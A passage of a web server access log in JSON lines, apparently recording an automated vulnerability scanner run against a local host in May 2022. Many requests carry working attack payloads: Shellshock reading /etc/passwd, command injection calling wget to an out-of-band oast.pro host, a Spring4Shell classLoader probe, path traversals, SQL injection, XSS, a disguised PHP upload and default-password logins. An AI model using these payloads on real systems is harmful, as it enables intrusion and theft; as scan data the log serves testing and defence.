Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca2tuc8smpv1g2s80ca01peacrjjwdjdt.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x2229N5Elsie3CVDhbc1JvwloX88DS.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://ca2tuc8smpv1g2s80ca0qt9ifgcyxy7dg.oast.pro)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/session_password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29N5EiOmyq0lRjEhBaaosJJv1XW'); INSERT INTO extra_field_options(option_value) VALUES ('29N5EiOmyq0lRjEhBaaosJJv1XW'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29N5EiOmyq0lRjEhBaaosJJv1XW', 16,0) ON DUPLICATE KEY UPDATE tag='29N5EiOmyq0lRjEhBaaosJJv1XW', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"29N5EgWcSToUzymgLBenXT3jVWV","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 